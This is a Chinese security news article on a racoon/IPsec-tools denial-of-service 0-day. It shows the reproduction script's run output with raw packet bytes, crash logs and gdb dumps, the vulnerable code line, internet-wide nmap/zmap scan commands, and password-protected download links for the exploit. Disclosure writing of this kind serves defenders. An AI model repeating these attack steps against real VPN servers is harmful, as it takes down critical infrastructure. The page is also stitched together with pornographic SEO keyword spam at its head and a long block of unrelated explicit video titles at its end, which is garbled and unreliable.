精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

安全 漏洞
IPsec-tools近日曝出拒絕服務0day漏洞,并且互聯網上已經出現利用程序。你可能質疑該漏洞甚至未達到中等漏洞的評級,但請記住IPsec是至關重要的基礎設施,并且這種攻擊只需要兩個小的UDP數據包。

IPsec-tools近日曝出拒絕服務0day漏洞,并且互聯網上已經出現利用程序。你可能質疑該漏洞甚至未達到中等漏洞的評級,但請記住IPsec是至關重要的基礎設施,并且這種攻擊只需要兩個小的UDP數據包。如果有打開日志記錄或者用戶經常斷開或重新連接那么就很容易被發現,它可能會創建Intrusion Detection/Prevention (IDP)簽名,更多的是,你可能需要運行一個蜜罐來進行檢測。

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

如果你有使用IPsec-tools,明智的做法就是盡快替換它。

什么是IPsec

IPsec是一款用于關鍵基礎設施的軟件。它改進IP棧,這樣IP層以下的所有協議都可以進行加密(TCP, UDP等等)。其通常被描述為VPN,同時也是VPN的一部分,但不要搞混淆IPsec到底是做什么的。

IPsec試圖提供的特性:

加密(可選)
身份驗證(可選)
保密性
完整性
可用性?

Demo:附在文末

用法:

python3 repro_racoon_dos129.py
Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied
Umm, okay.129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500))129 sending second packet
Umm, okay.

服務器崩潰:

sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 &
jvoss@ipsecu:~$ dmesg |tail
[  584.440533] AVX or AES-NI instructions are not detected.
[  584.442253] AVX or AES-NI instructions are not detected.
[  584.490468] AVX instructions are not detected.
[13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1
[13683.867223] init: upstart-udev-bridge main process ended, respawning
[13683.867307] init: upstart-file-bridge main process (452) terminated with status 1
[13683.867313] init: upstart-file-bridge main process ended, respawning
[13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1
[13683.867392] init: upstart-socket-bridge main process ended, respawning
[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128.
2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258]
2015-04-27 15:22:14: INFO: begin Identity Protection mode.
2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
Program received signal SIGSEGV, Segmentation fault.
0x000055555557ace7 in ?? ()
(gdb) bt
#0  0x000055555557ace7 in ?? ()
#1  0x000055555557b775 in ?? ()
#2  0x000055555556c1a1 in ?? ()
#3  0x0000555555563fd1 in ?? ()
#4  0x00005555555658ec in ?? ()
#5  0x000055555555fc9d in ?? ()
#6  0x000055555555f273 in ?? ()
#7  0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287
#8  0x000055555555f3ec in ?? ()
(gdb) x/15i $rip - 12
   0x55555557acdb:      mov    %eax,0x1c8(%rsp)
   0x55555557ace2:      mov    0x28(%r12),%rax
=> 0x55555557ace7:      mov    0x100(%rax),%rax
   0x55555557acee:      mov    0x30(%rax),%rax
   0x55555557acf2:      test   %rax,%rax
   0x55555557acf5:      je     0x55555557af00
   0x55555557acfb:      mov    (%rax),%rdx
   0x55555557acfe:      lea    0x20(%rsp),%r13
   0x55555557ad03:      mov    0x8(%rax),%rax
   0x55555557ad07:      lea    0x1c(%rsp),%rbx
   0x55555557ad0c:      lea    0x30(%rsp),%rsi
   0x55555557ad11:      mov    %r13,%rcx
   0x55555557ad14:      mov    %rdx,0x30(%rsp)
   0x55555557ad19:      mov    %rbx,%rdi
   0x55555557ad1c:      xor    %edx,%edx
(gdb) i r
rax            0x0      0
rbx            0x0      0
rcx            0x5555558dbe40   93824995933760
rdx            0x5555558dbe40   93824995933760
rsi            0x0      0
rdi            0x5555558dbdc0   93824995933632
rbp            0x5555558dbdc0   0x5555558dbdc0
rsp            0x7fffffffd180   0x7fffffffd180
r8             0x5555558dbdc0   93824995933632
r9             0x7ffff6cf07b8   140737334151096
r10            0xbdb00  776960
r11            0x5555558da301   93824995926785
r12            0x5555558da300   93824995926784
r13            0x555555822460   93824995173472
r14            0x5555558da420   93824995927072
r15            0x7fffffffd260   140737488343648
rip            0x55555557ace7   0x55555557ace7
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

#p#

不使用IPsec

IPsec有許多易受到攻擊的操作模式,你可以從他的配置中看出來。

不要使用預共享密鑰
不使用防火墻阻止攻擊者橋接你的網絡
不要讓個人或者沒有IT主管的公司橋接你的網絡
不要使用IPsec代替TLS
不要使用IPsec防止0-day
如果你沒有一個能干的IT人,不要運行它
不要購買一個沒有更新的IPsec設備軟件
....

如果NSA想要獲取你的所有數據,那么他們完全有這個能力。

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

關于漏洞

漏洞位置:

if (iph1->rmconf->proposal->gssid != NULL) {

Fuzzer(漏洞檢查工具)好像錯過了什么,黑客們好像也錯過了什么。如果不是我幸運以及堅持,可能我也會錯過些什么東西。

NetBSD, FreeBSD, Android以及其他許多產品都在使用IPsec tools,我認為這就有必要去尋找發掘漏洞。我檢測Makefile文件,在GSSAPI中Android并沒有進行編譯。

IPsec作者沒有回應我們的多次請求,我們也沒有聯系FreeBSD或NetBSD,因為我們沒有花足夠的時間來檢查kame.net。說實話看著NetBSD就蛋疼,我不會花過多的時間來安裝FreeBSD或NetBSD。我的同事在SourceForge已經發布這個漏洞,而我要做的事情就是充分的披露它。

修復一個漏洞需要多久

如果沒有類似的缺陷,修復一個漏洞大概需要1個小時左右,通知使用者卻需要20小時左右。

我不愿意做這樣的事情,這個問題自然有CVE解決。

實在無力吐槽IPsec-tools,如果你是它的死忠粉請不要來黑我。不介意的話我可以再從其中找個漏洞出來,再次公開!

意義何在

當IKE daemon崩潰,可能會導致重新啟動。一旦重新啟動,就給了攻擊者更多嘗試啟動IKE daemon的機會,結果:未知。如果不重新啟動,密鑰不會改變。當重復4次就會喪失其完整性和機密性,重啟又變得很容易了,結果:潛在妥協。

如果系統判斷這兩個設備不應該再使用IPsec,系統會恢復默認狀態,結果:可能完全妥協。

當加密完全被破環,加密層以下就很容易被攻擊者攻破。

IPsec被設計為運行于公共網絡,中間人攻擊也并非只是理論。中間人攻擊經常用在WIFI,公司網絡(平面拓撲結構),服務器(DMZ/segmented),骨干路由器(ISP)

我并沒有在這里危言聳聽。利用該漏洞,單獨一個人來攻擊公司網絡的可能性十分低(一個人至少需要4個小時的時間來嘗試)。NSA攻破伊朗air-gapped網絡并摧毀其離心機,如果他想獲取你所擁有的東西,使用該漏洞簡直輕而易舉!

關于IPsec設計

IPsec協議過于復雜,缺少x.509的靈活性,TLVs的設計是為了減少緩沖區溢出,開發者混淆不清導致出現許多錯誤。IKE daemon經常被設置為root權限,任何的IP數據包都可以瀏覽IPsec,實現IKE客戶端只用了8個小時,實現IKE服務端只用了8個小時。我們為什么需要靈活性?IPsec的作者應該為他自己感到羞愧,他們的思維依舊還活在90年代 。我們為什么還沒有取代IPsec?Bruce Schneier曾公開譴責IPsec,對于IPsec這已經不是什么新鮮事了,但對于IPsec的使用者來說這絕對不是一件好事情。

誰在使用IPsec-tools

IPsec-tools有一個唯一的響應簽名,你可以寫一個Nmap腳本去檢測。以下測試沒有在FreeBSD和NetBSD上進行進行。

你不需要運行

nmap -sU -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike1

或者

sudo nmap -sU -sV -O -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike2

再或者

sudo zmap ike

為了尋找一長串IPsec-tools使用者列表,你不需要進行網絡調查,nmap并不能輕松的使用這個exploit尋找漏洞服務器。

IPsec掃描器

目前有很多的IPsec掃描器在掃描使用IPv4協議的IKE服務器。你認為他們這樣做的目的是什么?一些人僅僅只是進行研究,一些人就是純粹的腳本小子,一些人就是為了進行IP地址欺騙攻擊。據我的推測手握0day的他們正在利用這個漏洞攻擊他們所遇到的所有VPN,從他們發送的數據包就可以看得出來。

數量   IP地址

915   92.156.83.10

413   88.182.227.2

379   222.64.125.46

366   202.153.47.42

156   92.139.69.91

146   195.87.244.8

134   2.12.52.14

132   5.107.86.214

115   93.100.141.178

113   212.57.6.226

102   212.21.46.34

98     41.214.10.33

92    114.35.125.229

90    41.136.2.241

90    41.136.18.209

85    79.165.141.243

79    67.68.122.156

79    46.14.13.125

64    124.148.219.105

60    190.199.39.243

59    203.59.158.2

57    95.29.206.187

56    185.56.161.133

56    154.70.115.98

46    41.136.47.233

45    86.235.41.154

43    212.87.172.4

42    89.157.119.185

41    50.189.102.250

幻燈片地址

[https://www.altsci.com/ipsec/ipsecs2a.html]

IPsec-tools 0-day Exploit

[鏈接:http://pan.baidu.com/s/1o6C9mOU 密碼:tfn4]

sig

[鏈接:http://pan.baidu.com/s/1dDo5bo9 密碼:4iki]

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2017-02-07 11:00:26

2009-07-06 13:15:07

2011-08-26 11:44:01

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2013-05-24 14:02:42

2022-03-30 09:09:39

漏洞網絡安全網絡攻擊

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2021-07-14 17:17:45

0day漏洞惡意代碼

2010-01-20 16:13:15

2011-02-28 09:34:55

2009-09-09 08:54:50

2011-03-15 15:14:22

2010-08-03 09:51:22

2024-07-31 08:46:10

2015-08-31 10:09:34

2010-09-01 15:18:04

2009-05-04 15:58:34

2009-11-29 16:53:17

點贊
收藏

51CTO技術棧公眾號

国产精品一区二区在线播放| 国产精品一区二区三区av麻 | 一级黄色电影片| 在线网址91| 99精品久久久久久| 国产精品久久久久久搜索| 国产又粗又长又硬| 亚洲超碰在线观看| 91激情五月电影| 樱空桃在线播放| 偷拍精品一区二区三区| 日本中文在线一区| 欧美激情日韩图片| 女女互磨互喷水高潮les呻吟| 国产激情一区| 色婷婷综合久色| 欧美日韩dvd| 国产精品免费观看| 国产成人小视频| 国产精品69精品一区二区三区| 疯狂试爱三2浴室激情视频| 极品束缚调教一区二区网站| 欧美午夜在线观看| 亚洲 自拍 另类小说综合图区| 国产在线一二三区| 不卡一区二区中文字幕| 成人国内精品久久久久一区| 青青草av在线播放| 在线电影一区二区| 国产亚洲激情在线| 国产xxxxxxxxx| 成人亚洲精品| 欧美日韩中文字幕一区| 精品国产免费av| 青草av在线| 亚洲欧美中日韩| 亚洲第一导航| 国产h视频在线观看| 99久久综合99久久综合网站| 亚洲一区二区三区久久 | 韩国精品一区二区三区| 中文字幕av一区| 亚洲av无码国产精品久久| 在线日韩成人| 日韩一级大片在线观看| gogogo高清免费观看在线视频| 在线看片国产福利你懂的| 亚洲国产欧美在线人成| 日韩激情视频一区二区| 好吊日视频在线观看| 中文在线一区二区| 日韩亚洲视频在线| 免费国产在线视频| wwwwww.欧美系列| 狠狠干一区二区| 人人妻人人澡人人爽人人欧美一区| 激情综合网最新| 国产人妖伪娘一区91| 五月婷婷丁香在线| 日本视频免费一区| 国产精品一区二区久久| 九九热最新视频| 日韩精品电影在线| 国产精品青青在线观看爽香蕉| 欧美一级特黄视频| 天堂av在线一区| 国产精品盗摄久久久| 日本久久综合网| 日本在线观看不卡视频| 国产精选久久久久久| 又骚又黄的视频| 精品伊人久久久久7777人| 成人黄色影片在线| aa视频在线免费观看| 国产高清一区日本| 国产精选在线观看91| 日韩一级片免费看| 久久亚洲综合av| 日韩视频在线播放| 91高清在线观看视频| 亚洲最大成人综合| 无码精品a∨在线观看中文| 在线最新版中文在线| 色哟哟一区二区| 中国黄色片一级| 大型av综合网站| 亚洲第一综合天堂另类专| 亚洲乱码国产乱码精品精大量 | 日韩精品成人一区二区在线观看| 成人av毛片| 亚洲三级理论片| 国产精彩视频一区二区| 午夜久久中文| 欧美麻豆精品久久久久久| 美女日批在线观看| 日韩在线黄色| 久久久精品影院| 日韩xxx高潮hd| 日韩电影在线观看网站| 51国产成人精品午夜福中文下载| 午夜视频在线播放| 中文字幕亚洲一区二区va在线| 男人添女荫道口喷水视频| 高清不卡av| 日韩一区二区三区在线| 青青草视频成人| 影视亚洲一区二区三区| 国产成人精品在线播放| 精品人妻一区二区三区含羞草| 91在线观看地址| 免费观看国产视频在线| 国产免费拔擦拔擦8x在线播放 | 久久久亚洲天堂| 看黄色一级大片| 福利一区福利二区| 午夜精品一区二区三区在线观看| 在线观看三级视频| 在线免费观看成人短视频| 国产亚洲精品成人a| 欧美色女视频| 欧美一区第一页| 成人av一区二区三区在线观看| 久久精品视频免费| 婷婷五月综合缴情在线视频| 色8久久久久| 亚洲午夜激情免费视频| 国产精品30p| 国产中文一区二区三区| 日韩精品一区二区三区色偷偷| 1024在线看片你懂得| 欧美一区欧美二区| 萌白酱视频在线| 日韩综合在线视频| 久久av一区二区三区亚洲| 少女频道在线观看高清| 欧美日韩mp4| 国产美女永久免费无遮挡| 99pao成人国产永久免费视频| 91欧美激情另类亚洲| 成人精品一区二区三区校园激情| 福利微拍一区二区| 精品国产人妻一区二区三区| 欧美在线高清| 亚洲在线免费看| 国产激情在线视频| 欧美久久婷婷综合色| 国产熟女一区二区| 视频在线观看一区| 欧洲一区二区在线| 日本一区二区三区视频在线| 亚洲精品在线91| 四虎成人永久免费视频| 91在线精品一区二区三区| www.99热这里只有精品| swag国产精品一区二区| 欧美激情图片区| 午夜精品在线播放| 亚洲国产日韩a在线播放性色| 国产免费a级片| 亚洲激情av| 鲁鲁狠狠狠7777一区二区| 日韩伦理精品| 一区二区在线视频| 中文字幕av久久爽| 亚洲视频每日更新| 国产精品欧美性爱| 99视频+国产日韩欧美| 欧美精品久久久| 春暖花开亚洲一区二区三区| 亚洲日本成人女熟在线观看 | 678五月天丁香亚洲综合网| 潘金莲一级黄色片| 国产成人高清视频| a级黄色一级片| 沈樵精品国产成av片| 国产精品视频区1| gogo在线观看| 亚洲精品美女网站| 国产91av在线播放| 亚洲精品免费一二三区| 好男人香蕉影院| 久久午夜精品| 综合视频免费看| 91精品啪在线观看国产手机| 98精品在线视频| 高h视频在线| 91精品国产综合久久福利| 国产精品theporn动漫| 久久精品这里都是精品| 亚洲免费av一区| 在线播放亚洲| 视频一区亚洲| 亚洲综合影院| 日本欧美中文字幕| av激情在线| 亚洲老板91色精品久久| 国产又爽又黄又嫩又猛又粗| 亚洲国产精品久久不卡毛片| 国产精品20p| 国产一区二区不卡在线| 国产一区二区在线视频播放| 久久精品国产99久久| 国产精品久久久久久久天堂第1集 国产精品久久久久久久免费大片 国产精品久久久久久久久婷婷 | 国产精品嫩草影院一区二区| 91高清在线观看视频| 亚洲欧洲在线看| 超碰人人人人人人| 欧美日韩一本到| 日韩欧美性视频| 成人免费在线播放视频| 亚洲欧美日本一区| 激情六月婷婷综合| 日韩一级免费在线观看| 欧美日韩精品| 亚洲美女搞黄| 丝袜美腿一区二区三区动态图| 成人免费在线网址| 欧美色片在线观看| 2020欧美日韩在线视频| 91亚洲天堂| 日韩视频免费在线| 高清日韩av电影| 亚洲精品福利在线观看| 99re只有精品| 欧美日韩美少妇| 国产视频1区2区| 五月婷婷另类国产| 青青草免费av| 中文字幕五月欧美| 中文字幕黄色网址| 久久久99精品免费观看不卡| 国产美女视频免费观看下载软件| 黄网站免费久久| jizz18女人| 日韩国产在线观看| 乱子伦视频在线看| 亚洲中字在线| 国产 福利 在线| 亚洲毛片在线| 婷婷无套内射影院| 99国产精品视频免费观看一公开| 久久久久久久久久久综合| 欧美成人首页| 黄色一级片av| 欧美99久久| 久久国产精品免费观看| 久久精品国内一区二区三区水蜜桃| 神马影院我不卡| 欧美美女在线| 日韩av电影免费在线| 精品影片在线观看的网站| 玛丽玛丽电影原版免费观看1977 | 加勒比av一区二区| 日本肉体xxxx裸体xxx免费| 日韩精品1区2区3区| 日本999视频| 日韩精品久久久久久| 国产精品久久久久9999小说| 日韩制服丝袜先锋影音| 天天爽天天爽夜夜爽| 美腿丝袜一区二区三区| 男生操女生视频在线观看| 国内精品在线播放| 蜜桃视频无码区在线观看| 成人小视频免费观看| 成人手机在线免费视频| 久久精品亚洲国产奇米99| 五月天婷婷丁香网| 亚洲欧美日韩一区二区| 免费毛片在线播放免费| 午夜a成v人精品| 亚洲永久精品一区| 91麻豆精品国产91久久久久久久久 | 97视频资源在线观看| 欧美a一欧美| 日韩欧美精品在线不卡| 国产精品毛片久久| 国产玉足脚交久久欧美| 亚洲欧美卡通另类91av| 天堂在线资源视频| 国产精品一级片在线观看| 中文乱码人妻一区二区三区视频| 久久精品一区二区三区不卡| 欧美肥妇bbwbbw| 亚洲v精品v日韩v欧美v专区| 自拍偷拍18p| 日韩欧美一级精品久久| 偷拍自拍在线视频| 精品国产区一区二区三区在线观看| 免费在线看电影| 欧美在线性视频| 国产aa精品| 欧美成ee人免费视频| 欧美激情成人| 欧美一级视频在线播放| 日韩专区在线视频| 一级黄色大片免费看| 国产亚洲成aⅴ人片在线观看| 农村妇女精品一区二区| 欧美日韩国产一区二区| 97人妻精品一区二区三区动漫 | yjizz视频网站在线播放| 久久久av免费| 625成人欧美午夜电影| 亚洲自拍小视频| 精品国内自产拍在线观看视频 | 成人在线观看亚洲| 欧美中文字幕在线播放| 久久av偷拍| 亚洲成人自拍视频| 99亚洲伊人久久精品影院红桃| 精品国产鲁一鲁一区二区三区| 久久免费精品国产久精品久久久久| 懂色av懂色av粉嫩av| 色老汉av一区二区三区| 凸凹人妻人人澡人人添| 欧美日韩成人网| 91国产精品| 亚洲精品乱码视频| 久久久人人人| 人妻体内射精一区二区三区| 中文字幕中文字幕在线一区 | 午夜激情在线| 国产色婷婷国产综合在线理论片a| 欧美成人一区在线观看| 91网站在线观看免费| 久久激情五月婷婷| 人妻一区二区视频| 欧美性猛交xxxx富婆弯腰| 蜜桃av中文字幕| 久久av.com| 日韩久久一区| 手机在线观看国产精品| 日日摸夜夜添夜夜添精品视频| 一边摸一边做爽的视频17国产| 亚洲欧美一区二区不卡| 91精品国自产| 日韩在线观看免费全集电视剧网站| 欧美黑人疯狂性受xxxxx野外| 国产在线欧美日韩| 国产深夜精品| 亚洲综合自拍网| 五月开心婷婷久久| 婷婷伊人综合中文字幕| 亚洲91精品在线观看| 国产精品毛片av| 隔壁人妻偷人bd中字| 成人一区二区三区视频| 免费中文字幕视频| 精品国产制服丝袜高跟| 男人添女人下部高潮视频在线观看| 91精品在线观| 综合久久久久| 亚洲熟女一区二区三区| 亚洲一区二区三区免费视频| 亚洲第一天堂网| 国模私拍视频一区| 欧洲在线一区| 91av俱乐部| 国产色91在线| 中文字幕在线2018| 久久久国产一区二区三区| 国产精品一区二区三区av| 狠狠精品干练久久久无码中文字幕 | 国产成人综合av| 日韩欧美中文| 日本美女久久久| 亚洲午夜在线电影| 欧洲毛片在线| 国产精品专区h在线观看| 在线中文一区| 中国特级黄色大片| 色偷偷久久一区二区三区| 色综合久久久久综合一本到桃花网| 成人综合网网址| 在线成人黄色| 无码国产69精品久久久久同性| 欧美在线不卡视频| 国产盗摄在线观看| 韩国成人动漫在线观看| 天堂午夜影视日韩欧美一区二区| 一级性生活免费视频| 亚洲成色www8888| 国产精品亚洲d| a级片一区二区| 久久网站最新地址| 国产又粗又猛又爽| 91国内揄拍国内精品对白| 日本黄色精品| 97人人模人人爽人人澡| 一本到不卡免费一区二区| 精品孕妇一区二区三区| 狠狠色噜噜狠狠狠狠色吗综合| 日本不卡一区二区三区| 国产精品suv一区二区| 伊人亚洲福利一区二区三区| 视频一区中文字幕精品| 日本在线观看a| 亚洲精品国产无套在线观| 黄色av免费在线观看|